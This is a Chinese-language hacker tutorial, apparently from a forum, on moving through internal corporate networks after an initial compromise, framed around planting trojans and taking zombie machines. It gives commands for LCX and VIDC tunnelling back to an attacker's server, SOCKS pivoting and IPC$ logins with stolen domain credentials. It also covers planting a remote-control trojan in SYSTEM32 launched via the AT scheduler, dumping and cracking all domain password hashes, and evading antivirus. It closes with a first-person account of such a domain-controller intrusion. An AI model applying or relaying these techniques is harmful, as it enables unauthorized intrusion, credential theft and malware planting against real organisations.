[月]教你如何进行内网渗透1-2

米可

入侵网站也好，服务器也好，放木马抓肉鸡也好，总会遇到一些内网的问题，那么如果要弄的机器在一个内网中如何处理呢？
今天[月]就来带大家认识一下。
教程较长，分节来。
我在这推荐 VIDC 这个工具，很方便，在CMD下直接操 VIDC.EXE -D -P PORT 就可以了。
    3-2-2。在利用机器上使用LCX，CMD下 LCX.EXE -SLAVE 服务器IP PORT 127.0.0.1 PORT，然后到服务器上 CMD下 LCX.EXE -LISTEN 服务器IP PORT 任意PORT。
    3-2-3。建立SOCKS后在本地可以用SOCKSCAP来进行连接，成功连接后该操作什么就看你们自己了。
    基本上我们就只能操作这么多了，后面已经没有什么技术上的再使用或利用，但是这中间的经验不少，所需要处理的细节也不少。
    我们在得到内网机器后，如果他存在域，但是没有使用域账号怎么办?那我们只能查询或者想尽一切手段获得他常用的账号密码，然后利用这个账号密码，再通过SOCKS进入域。这其中就关系到各位同行查看控制机器的文件，还有记录密码，GINA，HASH破解，这些都是必须的。
    进入域后，我们又该怎么做，建立SOCKS后又该怎么做。我们可以扔S上去查看主要的端口，我们可以对端口进行弱口令的尝试，我们可以针对内网的WEB进行检测，方式很多，甚至你可以用MS08-067对另一台机器进行突破，但是相信我，能使用域的机器，大部分都是补丁打齐的。我们能利用的很少，但是不能灰心，只要能在内网穿梭，我们至少在防御上会轻松很多，我们需要的只是耐心和时间。
    一旦拥有密码，我们就可以尝试IPC连接，直接拿下域，这就得看你们的权限有多大。
    net use \\IP\ipc$ password /user:username@domain
    推荐使用这样的方式输入账号和密码，为什么?如果用户名存在空格，你这样输会保险些。什么 域用户不能存在空格?
    是的，以前我也认为不会，微软的讲师也说不会，不过，经过我的测试和经验，那是假的，域 完全可以空格，除了 user name 这样的，还可以存在　user na me ，不信　你可以试试。
    建立IPC后，你只是想COPY文件　或者 RAR文件　再或者种马　那就是你的自由了。
    后话：最近因为在渗域，在渗透过程中，也确实出现一些问题，几次都是不知如何进行，其实在技术上，并没有什么障碍。主要是在于对方有着比较强的主防御，而我的远控最开始连CMD都无法执行，后经过几天的环境测试，突破了CMD。有了CMD后，进行了查询，获得了一些信息，就开始了往下的渗透，被控机器的密码我不是跑出来的，我是翻他的文件翻出他常用密码的。因为他没有使用域账号，都是以系统账号登陆，所以无法查看域。我只能用他的域账号建立IPC连接，查找到内网的一个WEB服务，将其渗透后才算拿下了一个稳定的内网机器。
    拿下内网WEB服务器后，我就已经完全在域内，没有使用HASH INJECTION，我是先查询了DOMAIN ADMINS，发现WEB服务器上的账号就属于这个组，PW后得到了HASH，破解掉我就连向了域控服务器的IPC$。
    连接了IPC$，直接在其SYSYTEM32下扔了一个远控，然后用AT命令将其启动，这期间我尝试了5个SHIFT，但是SHIFT关闭后，我的远控也会掉，所以排除了这种方法，还是用AT来ADD NEW JOB 比较方便。
    给域控服务器种了远控，利用CMD来GETHASHES了全部的HASHES进行破解，很幸运的查到了文件管理组的用户，这才有了我后
    面的目标达成。
    总的来说，我这次的渗透比较运气好，中间麻烦事不是太多，不过也花了半个月的时间，时间大部分花在测试防御环境，软件免杀，木马免杀，查找资料这些上面。